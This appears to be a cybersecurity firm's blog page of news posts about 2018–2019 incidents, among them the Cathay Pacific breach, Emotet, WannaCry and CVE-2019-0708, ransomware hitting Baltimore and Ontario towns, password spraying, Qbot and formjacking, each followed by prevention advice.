Thought leadership. threat analysis, news and alerts.
Hong Kong Privacy Watchdog Orders Cathay to Overhaul IT Systems Over 2018 Data Breach
Hong Kong’s Privacy Commissioner for Personal Data Stephen Kai-yi Wong has ordered Cathay Pacific Airways Limited and Hong Kong Dragon Airlines Limited, collectively referred to as Cathay, to overhaul its IT systems containing personal data of its customers over the 2018 data breach which affected approximately 9.4 million passengers from different parts of the world.
On October 24, 2018, Cathay notified both the public and Hong Kong’s Privacy Commissioner for Personal Dataover the detected suspicious activity on its network on March 13, 2018. According to Cathay, approximately 9.4 million Cathay passengers, specifically those who availed the company’s frequent flyer programs Asia Miles and Marco Polo Club as well as registered users of Cathay from over 260 locations worldwide were affected by the cyber incident. The affected personal data of Cathay passengers include name, flight number and date, title, email address, membership number, address and phone number.
Customers of both Cathay Pacific Airways Limited and Hong Kong Dragon Airlines Limited, also known as Cathay Dragon, were affected as Cathay Pacific managed and provided information management services to Cathay Dragon. With this set-up, personal data of Cathay Dragon’s passengers reside on Cathay Pacific’s IT System.
The “Data Breach Incident Investigation Report” publicly released by Hong Kong’s Privacy Commissioner for Personal Data – with many of the data coming from the disclosure of Cathay itself – identified three cyber incidents on Cathay systems: keylogger attack in October 2014, exploitation of a known security vulnerability attack in August 2017 and brute force attack in March 2018.
The earliest evidence of keylogger malicious software (malware) activity on the company’s system was on October 15, 2014. In keylogging, every keystroke made on a computer, such as usernames and passwords, is captured and these captured data are automatically sent to the attackers for criminal exploitation. It wasn’t known how the unknown attacker or attackers initially intrude the company’s system that led to the dropping of the keylogger malware.
Valid user account login details stolen via the keylogger malware, according to the report, enabled the attackers to move further into the company’s network and dropped additional tools to steal domain credentials.
Exploitation of Known Vulnerability Attack
The earliest evidence of suspicious activity where it was found that the attackers exploited a known vulnerability on the company’s internet facing server was on August 10, 2017. The exploitation of this known vulnerability allowed the attackers to bypass authentication and gain administrative access to the company’s internet facing server.
Exploiting the known vulnerability also allowed the attackers to move laterally inside the company’s IT system and install malware and credential harvesting tools. It wasn’t disclosed what particular vulnerability on the company’s internet facing server was exploited. It was, however, revealed that this particular security vulnerability was publicly known as early as 2007.
Brute Force Attack
The earliest evidence of brute force attack on the company’s system was on March 13, 2018 which resulted in approximately 500 staff users being locked out of their user accounts. In a brute force attack, a cyber attacker attempts to crack the correct username and password using a trial and error approach. There are currently brute force attack tools available to attackers that automate the process of guessing the correct username and password using thousands of commonly used usernames and passwords.
Even as the keylogger attack which happened in October 2014, exploitation of a known security vulnerability attack in August 2017 and brute force attack in March 2018, Cathy only informed the public and Hong Kong’s Privacy Commissioner for Personal Data about the suspicious activity on its network on October 24, 2018. In Hong Kong, however, there’s no law that mandates organizations such as Cathay to notify within a prescribed period of time the Privacy Commissioner for Personal Data and the data subjects of a data breach.
“Cathay did not take all reasonably practicable steps to protect the Affected Passengers’ personal data against unauthorised access in terms of vulnerability management, adoption of effective technical security measures and data governance, contravening DPP 4(1) of Schedule 1 to the Ordinance [Hong Kong’s Personal Data Ordinance],” Wong said.
The Commissioner, in particular, found Cathay had not taken reasonably practicable steps not to expose the administrator console port of its internet facing server which opened the door for attackers. “Cathay should have applied effective multi-factor authentication to all remote access users for accessing its IT System involving personal data,” The Commissioner said.
Data Breach Prevention
Under Hong Kong’s Personal Data Ordinance, if after an investigation, the Privacy Commissioner for Personal Data finds that a data user is contravening or has contravened a requirement under the Ordinance, the Commissioner may serve on the data user an Enforcement Notice to prevent recurrence of the lapses. The Commissioner’s Enforcement Notice directed Cathay to engage an independent data security expert to “overhaul the systems containing personal data to the effect that these systems are free from known malware and known vulnerabilities”.
The Commissioner also directed Cathay to implement effective multi-factor authentication to all remote users for accessing the company’s IT System involving personal data and to conduct a regular review of remote access privileges.
In order to prevent Cathay-like data breach, it’s also important to keep all your organization’s software, especially server operating systems up-to-date, as attackers typically try to exploit known software security vulnerabilities.
Navigating the world of cybersecurity can be difficult for many businesses, including large enterprises.
Malicious Email Campaigns Geo-Targets Canadian Organizations, Report Says
Canadian organizations are increasingly becoming the targets of cyber-attackers as shown in the recent discovery of nearly 100 malicious email campaigns specifically targeting organizations based in Canada.
In the report "Beyond 'North America' - Threat actors target Canada specifically" researchers at Proofpoint reported that between the period of January 1, 2019 to May 1, 2019, threat actors conducted nearly 100 malicious email campaigns specifically targeting Canadian organizations or were customized for Canadian audiences.
Malicious Email Campaigns
Malicious email campaign, also known as phishing scam, is a type of cyber-attack that uses emails as a weapon. Phishing emails contain malicious attachments or malicious links.
Downloading this malicious attachment or clicking this malicious link could lead to compromise. Victims are tricked into opening the malicious email and downloading this malicious attachment or clicking this malicious link as threat actors use branding familiar to the recipients.
In the recent malicious email campaigns detected by Proofpoint researchers, the top affected organizations in Canada include financial services, energy/utilities, manufacturing, healthcare and technology. The researchers also observed that some of the malicious emails sent were customized for the French-speaking recipients in Canada.
In the nearly 100 malicious email campaigns specifically targeting Canadian organizations, Proofpoint researchers also observed that the threat actors tricked the victims into opening the malicious email or downloading the malicious attachment or clicking the malicious link by stealing the branding of several notable Canadian companies and agencies including national banks, major shipping and logistics organizations and government agencies.
“Emotet in particular, with its frequent region-specific email campaigns, is bringing new attention to geo-targeting in Canada …,” Proofpoint researchers said.
The first version of the malicious software (malware) Emotet, which was first observed in 2014 targeting German and Austrian victims, functioned as a banking trojan – a type of malware designed to steal financial data.
Since then, Emotet has evolved into a powerful malware, with its ability to continuously evolve and update its capabilities for various online criminal activities from information stealing to distributed denial-of-service (DDoS) attacks. In recent years, instead of delivering its own banking trojan, Emotet has delivered third-party banking trojans such as Qbot, The Trick, IcedID and Gootkit.
In 2018, the United States Computer Emergency Readiness Team (US-CERT)issued an alert, warning about the dangers of Emotet. "Emotet continues to be among the most costly and destructive malware affecting state, local, tribal, and territorial (SLTT) governments, and the private and public sectors,” US-CERT said. “Emotet infections have cost SLTT governments up to $1 million per incident to remediate.”
One of the reasons why Emotet continues to be among the most costly and destructive malware is its worm-like capability, that is, the ability to spread from computer to computer without any human action.
Emotet has been known to spread from computer to computer without any human interaction by accessing Server Message Block (SMB), an internet standard protocol that Windows uses to share files, printers and serial ports. “Emotet’s access to SMB can result in the infection of entire domains (servers and clients),” US-CERT said.
Emotet is also capable of spreading its own phishing email without human interaction through the use of Outlook scraper, a tool that’s used to scrape names and email addresses from the victim’s Outlook accounts and uses this names and email addresses to send out additional phishing emails from the compromised accounts.
According to Proofpoint researchers, the threat actor called “TA542” is the primary actor behind Emotet. Proofpoint researchers said that this threat actor is known to use the latest version of Emotet and develops malicious emails specific to given regions in the world.
"TA542 typically distributes high volume email campaigns consisting of hundreds of thousands or even millions of messages targeting all industries,” Proofpoint researchers said. “TA542 is currently one of the most prolific actors in the entire threat landscape. With TA542’s international reach and high volume campaign strategy, we expect Emotet use to continue to grow in the upcoming quarters.”
Even as Emotet has evolved in terms of capabilities, one thing remains constant with this malware: delivery is always via malicious email. As the delivery is always via malicious email, it’s important to protect your organization’s email system from this threat through the following mitigating measures:
Here are additional cyber-security measures in order to block or mitigate the effects of Emotet:
Timely identification and mitigation of IT risks can save your business from suffering costly consequences. Call us todayand we will show you how to better protectyour staff and your sensitive information against targeted attacks.
How to Protect Your Organization’s Computers from WannaCry-Like Cyber-Attack
Microsoft recently took an unusual step of rolling out a patch for Windows operating systems that are out of support in an effort to stop a WannaCry-like cyber-attack.
This is the second time in just over 2 years that the technology giant rolled out a patch for Windows operating systems that are out of support. The previous unprecedented patch was rolled out at the height of the WannaCry cyber-attack on May 12, 2017.
According to Microsoft, the latest patch, which was released on May 14, 2019, fixes the security vulnerability in out-of-support versions of Windows, specifically Windows 2003 and Windows XP; as well as versions of Windows that still receive support from Microsoft, specifically Windows 7, Windows Server 2008 R2 and Windows Server 2008.
Failure to apply the May 14, 2019 patch renders the above-mentioned out-of-support and in-support versions of Windows vulnerable to WannaCry-like cyber-attack, this according to Simon Pope, Director of Incident Response at Microsoft Security Response Center (MSRC).
What Is WannaCry?
WannaCry is a malicious software (malware) that wreaked havoc in more than 300,000 computers in over 150 countries in less than 24 hours on May 12, 2017. Once a computer becomes infected with WannaCry, this malware encrypts files on the computer's hard drive, making it impossible for legitimate users to access them, and demands a ransom payment in exchange of the decryption keys that supposedly would unlock the encrypted files.
After infecting one computer, the WannaCry malware spreads itself through the network, infecting other vulnerable devices, without the need for further action from the users. Attempts on the part of the WannaCry victims to unlock the encrypted files by paying the ransom was a useless endeavour as the source code of this malware was written in such a way that it isn’t possible to determine who paid the ransom and who didn’t, as such, there’s no way to decrypt on a per-user basis.
Two months, specifically on March 14, 2017, prior to the WannaCry cyber-attack, Microsoft released a patch that fixes the security vulnerability exploited by WannaCry. The patch, however, wasn’t made available to Windows operating systems that were out of support, specifically Windows XP, Windows 8 and Windows Server 2003. At the height of the WannaCry cyber-attack on May 12, 2017, Microsoft took an unusual step of rolling out a patch for these 3 out-of-support versions of Windows.
The WannaCry malware was able to infect hundreds of thousands of computers in less than 24 hours as a result of these two features: remote code execution and worm capabilities.
Remote code execution is the ability of a malicious actor to access someone else's computer and make malicious changes to this computer regardless of the geographical location of this device. Worm capability, meanwhile, refers to the capability of a malware to spread itself through the network, infecting other vulnerable devices, without user interaction.
The May 14, 2019 patch released by Microsoft fixes the security vulnerability labelled CVE-2019-0708. Similar the WannaCry malware, security vulnerability CVE-2019-0708 exhibits remote code execution and worm capabilities.
Pope, Director of Incident Response at Microsoft Security Response Center (MSRC), said in a blog post, that while there’s no evidence that this security vulnerability has been exploited in the wild, it’s highly likely that malicious actors will write an exploit for this vulnerability and include it into their malware.
The security vulnerability, Pope said, is “wormable”, which means that “any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way as the WannaCry malware spread across the globe in 2017.”
WannaCry, in particular, infects vulnerable Windows operating systems via Server Message Block 1.0 (SMBv1) server – a protocol that enables Windows systems to share files, printers and serial ports. In vulnerability CVE-2019-0708, remote code execution and worm capabilities are made possible via Remote Desktop Protocol (RDP) – a proprietary protocol developed by Microsoft which allows users to access another computer over a network connection. “The Remote Desktop Protocol (RDP) itself is not vulnerable,” Pope said. “This vulnerability is pre-authentication ….”
Many malware in the past were able to bypass anti-malware and other security defences via RDP. Malicious actors gain access to compromised devices by stealing or brute forcing RDP credentials.
In early 2019, authorities shut down xDedic Marketplace, a website involved in the illicit sale of RDP credentials. According to authorities, RDP login details of tens of thousands of compromised servers owned by unknowing companies and private individuals were sold on the xDedic platform for amounts ranging from $6 to more than $10,000 each.
The top preventive measure in order to protect your organization’s computers from WannaCry and WannaCry-like cyber-attack is by keeping all software and, in particular, operating system software up-to-date.
It’s worthy to note that even though it has been a long time since the major WannaCry attack, organizations continue to be victimized by this malware. Months after the major WannaCry attack, US aircraft maker Boeingfell victim to WannaCry. In March 2018, Mike VanderWel, chief engineer at Boeing Commercial Airplane production engineering, sent out an alert to his colleagues that the WannaCry malware was “metastasizing rapidly” out of Boeing’s North Charleston production plant and could potentially “spread to airplane software”. Linda Mills, head of communications for Boeing Commercial Airplanes, in a statement said, “The vulnerability was limited to a few machines.”
As an added protection to your organization’s computers, it’s best to disable Windows protocols that are often exploited by malicious actors. Specific to WannaCry malware, disable SMB protocol and for the security vulnerability CVE-2019-0708, disable RDP.
Connect with our cyber security expertstoday to learn more about common threats and prevent cyberattacks.
Retargeted Attacks Continue to Rise
Once a target, always a target. This seems to be the case in the City of Baltimore in Maryland as the City recently suffered another cyber-attack – the second attack in just over a year.
Last May 7, Baltimore Mayor Bernard Jack Young announcedthat the City’s network was infected with a ransomware. As a precaution, he said the City shut down the majority of its servers. While the City’s essential services such as police and fire departments are operational, the ransomware infection and the resulting shutting down of the majority of the servers resulted in network outage, email outage and phone outage with nearly every other department of the City affected.
Just over a year ago, in March 2018, the City of Baltimore suffered another cyber-attack. The 2018 attack was, however, limited to Baltimore's computer network that supports emergency calls. The attack forced the staff to resort to manual operations to handle calls.
Baltimore Chief Information Officer and Chief Digital Officer Frank Johnson told Ars Technicathat the 2018 cyber-attack which brought down Baltimore's computer-aided dispatch (CAD) system was caused by a ransomware. It wasn’t revealed what was the exact type of ransomware that hit Baltimore’s CAD system.
The point of entry of the ransomware was, however, partially identified. According to Johnson, the Baltimore City Information Technology office determined that "the vulnerability was the result of an internal change to the firewall by a technician who was troubleshooting an unrelated communication issue within the CAD System”.
In a press conference, Baltimore Chief Information Officer and Chief Digital Officer Johnson said that the recent cyber attack on Baltimore’s system was caused by the “very aggressive RobinHood ransomware".
Ransomware is a type of malicious software (malware) that locks out computer users by encrypting computer systems or files and demands from victims ransom payment in exchange for the decryption keys that would unlock the encrypted computer systems or files.
RobinHood ransomware is a fairly new malware. In early April last month, the RobinHood ransomware similarly infected the network of the City of Greenville, South Carolina, which prompted the City to shut down the majority of its servers.
In late April last month, security researcher Vitali Kremez reverse engineered a sample of the RobinHood ransomware. Kremez told BleepingComputerthat on execution, this malware stops 181 Windows services associated with antivirus and other software that could keep files open and prevent their encryption. This ransomware also doesn’t spread within the network, which means that every infected computer is individually targeted.
Kremez, meanwhile, told Ars Technica that the RobinHood ransomware attacker or attackers need administrative-level access to a system on the network “due to the way the ransomware interacts with C:\Windows\Temp directory”. It’s still unknown how the RobinHood ransomware gains access to a network and the computers connected toit.
The Robinhood ransomware drops its ransom note on the desktop, informing victims that 3 bitcoins must be paid to get the decryption key of one computer or alternatively send 13 bitcoins for the decryption keys of an entire infected system. The ransom note also states that the cost of payment increases “$10,000 each day after the fourth day.” The value of 1 bitcoin as of May 11, 2019 4PM GMT+7 is $6,312.
Prevalence of Retargeted Cyber Attacks
A study conducted by FireEye Mandiantfound that organizations that have been breached before are much more likely to be targeted again. In 2017, FireEye Mandiant reported that 56% of victims of at least one significant cyber-attack were targeted again by the same or similarly motivated attack group. In 2018, this number has continued to climb, increasing to 64%, FireEye Mandiant reported.
The top 5 retargeted industries in 2018 were finance (18%), education (13%), health (11%), pharmaceutical (9%), retail and hospitality (7%), and telecommunications (7%).
The FireEye Mandiant report further found that in 2018 organizations in the Asia-Pacific (APAC) region were far more likely to succumb to retargeted attacks, with 78% of APAC organizations fell victim to another attack. The said report also found that for the same period, 63% of organizations in the Americas fell victim to another attack. The report also found that for the same period, 57% of the organizations in Europe, Middle East, and Africa (EMEA) fell victim to another attack.
"This data further substantiates the fact that if you’ve been breached, you are much more likely to be targeted again and possibly suffer another breach," FireEye Mandiant said.
How to Prevent Retargeted Attacks
Configuring ordinary workstations not to install software and establishing a separate device or devices exclusively for administrative tasks (for installing and removing software and changing configuration settings) are two preventive measures in reducing the odds of malicious actors gaining access into your organization’s network.
Configuring ordinary workstations not to install software is a proactive means of preventing accidental installation of malicious software by unwittingly downloading malicious attachments or clicking on malicious links contained inside malicious emails.
Devices exclusively used for administrative tasks, meanwhile, should be secured through the following:
When you need help preventing cyberattacks and protecting your network and computers against ransomware, connect with our teamand get right advise at the right time.
Why Local Government Offices Are Targeted by Cyber Attackers and How to Prevent Such Attacks
In recent months, a concerning number of local governments in Ontario, Canada have openly admitted that they have been victims of cyber-attacks. What could have caused these attacks? And what can be done to prevent these attacks?
Town of Wasaga Beach
The Town of Wasaga Beach,Ontario admitted that on April 30, 2018, several of its servers were illegally accessed and infected with a ransomware – a type of malicious software (malware) that encrypts computer systems and files, locking out users and demands ransom payment in exchange for the keys that would decrypt or unlock the computer systems and files.
It took the Town of Wasaga Beach approximately 7 weeks to fully recover from the ransomware attack and as a result, the Town lost hundreds of thousands of Canadian dollars, with 3 bitcoin, valued at $34,950 Canadian at the time of payment, paid to the ransomware attackers and bulk of the cost went into the internal productivity losses totaling $251,759 Canadian.
Town of Midland
The Town of Midland, Ontario admitted that on September 1, 2018 its network was illegally accessed and infected with ransomware. Six days after the ransomware attack, on September 6, 2018, the Town of Midland announced that it initiated the process of paying the ransom demanded by the attackers. It wasn’t specified though how much was paid to the attackers.
In exchange for the decryption keys, the Town said that it “initiated the process to pay the ransom.” The Town added, “Although not ideal, it is in our best interest to bring the system back online as quickly as possible.”
City of Stratford
The City of Stratford, Ontario admitted that on April 14, this year, its computer systems were illegally accessed and infected with an unspecified virus – a type of malware that spreads by attaching itself to legitimate computer files and programs and distributed via infected flash drives, emails or websites. This unspecified virus, the City said encrypted computer systems and files and locked out users.
“We have now begun methodically unlocking and decrypting our systems,” the City said. “This is a thorough process that takes days, not hours.”
A computer virus that locks computer users out through encryption and requires decryption to unlock is typical of a ransomware. Decryption key or keys used to unlock the systems or files are given out by ransomware attackers. In the case of the City of Stratford, it wasn’t specified whether or not ransom was paid to the attackers.
City of Ottawa
On April 8, 2019, it was revealed that the City of Ottawa, Ontario fell victim to a common fraud scheme called “Business Email Compromise (BEC)” scam. The City's Office of the Auditor General reported that US$97,797 was transferred to an account of a phony supplier as a result of the BEC scam – a cyber attack that targets organizations that conduct wire transfers for its suppliers. In a BEC scam, email accounts of executives or high-level employees are either spoofed or compromised for the purpose of fraudulent wire transfers, resulting in hundreds of thousands of dollars in losses.
“On July 6, 2018, the General Manager, Corporate Services and City Treasurer (the ‘City Treasurer’), received an email (the ‘Email’) apparently from the City Manager,” the Office of the Auditor General said. “The Email, which was later identified as a spoofed email, requested that a wire transfer in the amount of US$97,797.20 (the ‘Funds’) be processed for the completion of an acquisition. With the City Treasurer’s approval, later that day the request was processed, and the Funds were issued.”
A portion of the City’s funds ended up in a bank account that the U.S. Secret Service monitored and seized. It’s unclear how much, if any, might eventually be recovered by the City of Ottawa from this seized bank account.
Local governments are targeted by cyber criminals as these government organizations are repositories of trove of sensitive data from government licenses to government contracts. The fact that local governments have the financial capability to pay also makes them attractive targets to cyber criminals. And the willingness of some local governments to pay attackers compounded this growing problem.
The growing number of cyber attacks, in particular, ransomware attacks against local government offices within Ontario prompted the Ontario Provincial Police(OPP) to issue a ransomware alert. As to the question of paying attackers ransom, the OPP said, “The OPP does not support paying ransomware attackers, as it only encourages further criminal activity, and there is no guarantee that payment will restore the encrypted data.”
Here are some cybersecurity best practices in order to prevent or mitigate the effects of cyber attacks:
Mind the Emails
Many of today’s cyber criminals use emails as a means to infiltrate the IT systems of organizations. Many of ransomware attacks are carried out by malicious emails, containing malicious attachments or malicious links. Clicking a malicious attachment or clicking a malicious link could allow the installation of malicious software on your organization’s system.
BEC scammers, meanwhile, rely mainly on emails as their means to perpetuate their fraudulent act. In both ransomware and BEC scams, attackers use emails as their weapon.
It’s, therefore, important to have an automated email solution that could identify and block emails with malicious attachments or links as well as identify and block spoofed or compromised emails. It’s also important to train your organization’s staff to identify and block malicious and fraudulent emails.
Backup Important Files
Organizations that entertain the idea of negotiating with cyber attackers are those that have weak back-up systems. If your organization regularly back-up your important files, there’s no reason for your organization to negotiate or pay the attackers for the locked or stolen data.
What Is Password Spray Attack and How to Prevent It
VPN provider Citrix, whose clientele includes more than 400,000 organizations including 98% of the Fortune 500 companies, recently disclosed that cybercriminals gained access and downloaded business documents from its internal network.
According to the Federal Bureau of Investigation (FBI), the one that informed Citrixabout the illegal intrusion, the attackers likely used a tactic known as password spray to gain a foothold with limited access to Citrix’ network and worked to circumvent additional layers of security.
What Is Password Spray Attack?
Password spray is a type of cyberattack that attempts to access a large number of usernames (accounts) using commonly used passwords. This type of attack is also known as low-and-slow method as an attacker or attackers at first attempt to login using a single commonly used password for a number of usernames. If the first password is incorrect for all the usernames, the attackers will then use a different password, giving sufficient time in between different password guessing so as not to trigger any time-based account lockout thresholds.
Attackers, for instance, can easily get all usernames of a certain organization using the toolMailsniperand then attempt to login using at first the commonly used password “P@$$w0rd” on all of the usernames, and if this password fails, after a sufficient time interval, use another commonly used password “Password1” and so on.
Password spray is a stealth form of cyberattack, evading most detection techniques. On the part of the legitimate user or the organization, login attempts that are part of password spray attacks are seen as isolated failed login.
On the part of the attackers, password spray attack is a numbers game. Even though commonly used passwords are used only by 0.5-1.0% of accounts, one successful attempt for every thousand accounts attacked is enough as this one successful attempt has a multiplying effect. Successful access to one account allows attackers to harvest further information.
A study conducted by the UK National Cyber Security Center (NCSC)showed that 75% of the participants’ organizations (UK-based) had accounts with passwords that featured in the top 1,000 passwords, and 87% had accounts with passwords that featured in the top 10,000.
"This data suggests that password spraying attacks are likely to have some success against these organizations, and many other organizations across the UK,” NCSC said. “Whilst account lockout policies may limit attackers to trying (for example) 10 passwords against a single account per day, the account lockout counters usually reset over time. This allows persistent attackers to try more passwords, and they can (and do) end up trying hundreds or even thousands of common passwords.”
The recent cyberattack on Citrix via password spray attack shows that cybercriminals are increasingly using this form of cyberattack against organizations worldwide. In March 2018, the U.S. Department of Homeland Security (DHS) and the FBI released a joint alertwarning the public against the growing threat of password spray attacks.
Passwords aren’t just used in emails. They’re also used in single sign-on (SSO) or web-based applications with federated authentication method. According to DHS and FBI, victims of password spray attacks often use SSO or web-based applications with federated authentication method. DHS and FBI added that the vast majority of known password spray victims share some of the following characteristics:
In March 2018, theFBIannounced the hacking-related charges against nine Iranians. The FBI said the accused conducted a 4-year campaign that compromised nearly 144 U.S.-based universities and 176 foreign universities in 21 countries. In addition to the compromised universities, the FBI said 50 U.S. and foreign private companies, the states of Hawaii and Indiana and the United Nations were compromised by the accused as well.
Over 30 terabytes of academic data and intellectual property, equivalent to 3 times the amount of data contained in the print collection of the Library of Congress, were stolen by the accused, the FBI said.
According to the FBI, the accused compromised their victims through password spray attacks. “They were flying under the radar,” said the FBI agent who investigated the case, “and the magnitude of their effort was remarkable.”
How to Prevent Password Spray Attacks
While password spray attacks can go undetected by security networks, there are, however, indicators of this type of cyberattack. Indicators of password spray attacks include the rise in attempted logins against the enterprise SSO portal or web-based application, and employee logins from IP addresses resolving to locations not consistent with their normal locations.
Here are some measures aimed at deterring password spray attacks:
Using MFA in all active, internet facing protocols is one way to deter password spray attacks. So long as there are passwords, attackers would forever guess them. MFA is a means to distinguish between a legitimate account owner and the attacker.
Banning commonly used passwords is another means to deter password spray attacks. Every password creation, change or reset should run through a banned password checker, containing a list of words that no one should ever have in their password.
Password spray attacks exist because of passwords. When passwords aren’t used at all, there would be no passwords that the attackers have to guess. Instead of passwords, use non-password-based authentication methods.
For instance, Windows Server 2016 enables completely password-free access based on strong cryptographic keys tied to both the user and the device.
Decade-Old Qbot Banking Malware Makes a Comeback
The decade-old Qbot banking malicious software (malware) has made a comeback, this time exploiting a tool that already exists on targeted computers: BITSAdmin.
Researchers at Varonisrevealed that thousands of computers around the globe have been compromised and under active control by a new variant of the Qbot malware, this time leveraging BITSAdmin, a common administration tool. The researchers said they found 2,726 unique victim IP addresses infected with this new variant of Qbot.
The researchers added that the number of victims is likely much larger as many organizations use port address translation that hides internal IP addresses. Majority of the Qbot malware victims, Varonis researchers said were located in the U.S., but victims were also found in Canada, the U.K., France, Brazil, Germany, South Africa, Russia, China and India.
What Is Qbot?
Qbot, also known as Qakbot or Pinkslipbot, is a malware that was first observed in the wild in 2007. Through the years, this malware has morphed into various versions due in part to the fact that the source code of this malware is publicly available. The various versions of Qbot retain the primary purpose of this malware, that is, to steal online banking account information from compromised computers.
According to Microsoft, over the years, cybercriminals behind Qbot have improved the Qbot code, enabling this malware to better “evade detection, stay under the radar longer, and increase the chances of spreading to other potential victims.”
Various versions of Qbot, including the latest version observed by Varonis, steal online banking account information from compromised computers through keylogging and hooking.
In keylogging, every keystroke that the victim enters is automatically captured and sent to the Qbot attackers. Hooking, also known as code hooking, modifies the behavior of a computer program. For instance, antivirus programs use hooking once it discovers the presence of a malware. On the flip side, cyberattackers use hooking as well, for instance, altering the behavior of a computer program or a browser, which can lead to exfiltration of passwords and cookies (referring to the text file that a web browser stores on a user's computer).
Another common feature of Qbot variants is the worm-like capability or the ability to spread across an organization’s network and infect other systems without user interaction. According to Microsoft, Qbot "can drop copies in other machines in the network using Server Message Block (SMB) and then use remote execution to activate.” SMB is a Microsoft Windows protocol for sharing files over a network.
Another common feature of Qbot variants is the initial infection process. Like many other cyberattacks, Qbot initially arrives on the victim's computer through malicious email campaigns, containing a malicious attachment and/or link.
What Is BITSAdmin?
BITS in the term “BITSAdmin” stands for Background Intelligent Transfer Service (BITS). BITS is a component of Microsoft Windows operating systems which facilitates updates and other applications to operate in the background without interrupting other networked applications.
Cybercriminals have learned to abuse BITS by using this legitimate administration tool for downloading, executing and even cleaning up after running malicious code. The interface to create and manage BITS jobs or tasks is accessible through PowerShell, a tool capable of executing code from memory and providing administrative access directly to a device's core, and BITSAdmin tool, a tool that can be used to create download or upload BITS jobs and monitor their progress.
In the past, cybercriminals behind Qbot have used PowerShell to download and run the Mimikatz, another malware that steals credentials, allowing attackers to move rapidly across a network once they have established an initial foothold.
Researchers at Varonis reported that the latest Qbot, uses BITSAdmin, another common administration tool in Windows operating systems, to download Qbot’s loader – a component that executes the core malware.
The abuse of legitimate administration tools such as PowerShell and the BITSAdmin are examples of “living off the land” cyberattack techniques that exploit tools that already exist on targeted computers. Exploiting these common administration tools makes detection difficult.
One probable explanation why the cyberattackers behind the latest variant of Qbot use the administration tool BITSAdmin, instead of PowerShell, is that PowerShell is now closely monitored on enterprise systems. A recent study conducted by IBMshowed that more than half or 57% of cyberattacks exploit tools that already exist on targeted computers. The IBM study highlighted that the administration tool that’s often exploited by cyberattackers is PowerShell.
Cyberattackers that abuse PowerShell and BITSAdmin have first to execute their malicious code on the targeted computer. The initial infection of PowerShell and BITSAdmin-based attacks is often phishing attacks, attacks that use malicious emails that contain malicious attachments and/or links.
In the case of the latest variant of Qbot, Varonis researchers said the first infection was likely carried out via a phishing email that tricked the victim into running a malicious file. Cybersecurity best practices for mitigating phishing attacks also apply for mitigating PowerShell and BITSAdmin-based attacks. These mitigating measures include deleting any suspicious emails, especially those containing suspicious links and/or attachments, and avoiding enabling macros in Microsoft Office.
Disabling all BITS functionality, meanwhile, as a preventive measure is a tricky business as this will likely have unintentional side effects, such as preventing legitimate software patching and updating. Some of the mitigating measures that are specific to BITSAdmin-based attacks include modifying host firewall rules and other network controls to only allow legitimate BITS traffic, and monitoring usage of the BITSAdmin tool, including the command options “Transfer”, “Create”, “AddFile”, “SetNotifyFlags”, “SetNotifyCmdLine”, “SetMinRetryDelay” and “Resume”.
Trend Shows Cybercriminals Are Turning to Formjacking
A newly released global cyberthreat trend shows that cybercriminals are turning to formjacking as a new get-rich-quick scheme.
In the recently released Internet Security Threat Report, Symantec reported that on average, more than 4,800 unique websites are compromised with formjacking every month. According to Symantec, formjacking has increased dramatically since mid-August 2018. By the end of 2018, Symantec said it detected 3.7 million formjacking attacks, with nearly a third of all detections occurring during November and December – the busiest online shopping period.
Symantec said that while any organization, regardless of size and location, which processes payments online is a potential victim of formjacking, small and medium-sized retailers are, by and large, the most widely compromised by formjacking attackers.
What Is Formjacking?
Formjacking is a type of cyberattack that injects malicious code into website forms. This malicious code allows attackers to steal credit card details and other personal and financial information that are entered into the compromised forms as information is automatically sent to attackers. Stolen information could be used by attackers to perform payment card fraud or attackers could sell these details to other cybercriminals.
According to Symantec, attackers need only 10 stolen credit cards from each of the more than 4,800 compromised websites each month to earn up to $2.2 million per month considering that the current value for each card is $45 in underground selling forums.
How Are Formjacking Attacks Carried Out?
In recent months, two methods of formjacking attacks were observed: supply chain attack and redirection chain.
Supply Chain Attack
One of the ways by which formjacking attackers gain access to a website and change the code on its checkout page is through supply chain attack. In a supply chain attack, attackers gain access to a large organization’s website and change the code on its checkout page by exploiting the security vulnerabilities in a smaller business used by the larger company to provide different services.
The Ticketmaster formjacking case is an example of a formjacking attack carried out by means of a supply chain attack. In the Ticketmaster case, attackers injected malicious code into Ticketmaster’s checkout pages after compromising a chatbot used by Ticketmaster for customer support. This malicious code enabled the Ticketmaster attackers to capture payment card data and other information from customers and send them to their servers.
The chatbot used by Ticketmaster for customer support was hosted by Inbenta, an external third-party supplier to Ticketmaster. Inbenta chief executive Jordi Torras toldZDNetthat attackers exploited a number of vulnerabilities of Inbenta’s servers and in the process altered the chatbot code.
The Ticketmaster formjacking case, therefore, wasn’t directly an attack against Ticketmaster but an attack on a third-party supplier Inbenta. It’s worthy to note that supply chain attack was also used in the NotPetya attack in 2017 in which MEDoc, a tax and accounting software package, was used for the initial insertion of NotPetya malware into corporate networks.
Supply chain attacks show that cybersecurity hygiene shouldn’t only be implemented within an organization’s internal IT systems but also for third-party software and applications.
Redirection chain as a means of carrying out a formjacking attack is a new technique used by attackers in late 2018. In a redirection chain attack, a user that uses a checkout page of an online retailer is redirected to the checkout page of another online retailer which is injected with formjacking code. When this user enters payment information, the information is sent both to the retailer as well as to the attackers.
In December 2018, Symantecreported that it detected a checkout page of a retail store in Paris which was injected with a formjacking code. The injected formjacking code, Symantec said, collects the payment information entered by customers and posts it to the domain google-analyitics.org.
Symantec observed that popular online retailers’ checkout pages from different countries, such as the U.S., Japan, Australia, and Germany redirected to this one Paris checkout page. “This created an interesting redirection chain as customers of all these websites were being infected by formjacking at the same time,” Symantec said.
Symantec added that to make matters worse, the formjacking code in the above-mentioned redirection chain attack comes with Firebug, a debugging tool that prevents security researchers from analyzing the malicious code.
Formjacking attacks are becoming sophisticated and stealthy as shown in the above-mentioned examples. Users of compromised checkout pages may not realize they’re victims of formjacking as compromised checkout pages generally continue to operate as normal.
Here are some cybersecurity measures in order to prevent formjacking attacks:
Don’t have cybersecurity resources or dedicated CISO? Contact us today to mitigate IT risks, fast.
Why Small Businesses are at Risk of Cyberattacks
Launching a small business is hard work. It takes months of planning, research, marketing and strategizing. It demands commitment, sweat, possibly even tears.
But once you have that enterprise up and running, the realization that you’ve carved your own niche in a highly-competitive marketplace makes it all worth it.
Imagine you’ve gone through this process. Imagine you’ve invested all your energy, resources and money into building a small business. Imagine you’re feeling confident in your brand and excited for what the future holds.
Now, imagine how devastated you’d feel if your company was attacked by a cybercriminal.
A large-scale cyberattack can leave your small business facing real financial difficulties, expose your valuable data and prompt your clients to wonder how safe their information is in your hands.
